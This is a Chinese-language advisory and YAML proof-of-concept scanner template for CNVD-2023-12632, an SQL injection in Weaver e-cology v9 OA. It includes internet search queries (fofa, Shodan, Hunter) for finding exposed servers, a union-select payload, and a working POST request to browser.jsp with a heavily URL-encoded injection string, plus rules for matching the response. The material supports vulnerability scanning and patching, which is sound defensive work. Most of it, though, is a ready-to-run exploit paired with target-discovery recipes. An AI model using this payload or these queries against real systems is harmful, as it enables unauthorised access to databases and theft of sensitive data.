漏洞描述
由于泛微e-cology9中对用户前台输入的数据未做校验,可以通过构造恶意的数据包导致SQL注入漏洞,进一步获取敏感数据。
fofa-query: app="泛微-协同商务系统"
shodan-query: 'ecology_JSessionid'
Hunter: title=="泛微-协同软件的精英团队,我们的目标:造就协同软件第一品牌!"
hex(hex(hex(a' union select 1,''+(SELECT @@VERSION)+')))
CNVD-2023-12632: 泛微 OA e-cology v9 sql 注入
PoC代码[已公开]
id: CNVD-2023-12632
info:
name: 泛微 OA e-cology v9 sql 注入
author: zan8in
severity: high
verified: true
description: |
由于泛微e-cology9中对用户前台输入的数据未做校验,可以通过构造恶意的数据包导致SQL注入漏洞,进一步获取敏感数据。
fofa-query: app="泛微-协同商务系统"
shodan-query: 'ecology_JSessionid'
Hunter: title=="泛微-协同软件的精英团队,我们的目标:造就协同软件第一品牌!"
hex(hex(hex(a' union select 1,''+(SELECT @@VERSION)+')))
affected: 泛微e-cology V9 < 10.56
solutions: https://www.weaver.com.cn/cs/securityDownload.asp#
reference:
- https://www.zhihu.com/tardis/zm/art/625931869?source_id=1003
- https://blog.csdn.net/qq_50854662/article/details/129992329
tags: cnvd,cnvd2023,ecology,sqli
rules:
r0:
request:
method: POST
path: /mobile/%20/plugin/browser.jsp
body: isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%36%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%33%33%25%32%35%25%33%35%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%30%25%32%35%25%33%34%25%33%30%25%32%35%25%33%35%25%33%36%25%32%35%25%33%34%25%33%35%25%32%35%25%33%35%25%33%32%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%39%25%32%35%25%33%34%25%36%36%25%32%35%25%33%34%25%36%35%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37
expression: |
response.status == 200 &&
response.body.bcontains(b'"autoCount"') &&
response.body.bcontains(b'"autoGet"') &&
response.body.bcontains(b'"baseSql"') &&
(response.body.ibcontains(b'Microsoft SQL Server') || response.body.ibcontains(b'MySQL') || response.body.ibcontains(b'Oracle'))
expression: r0()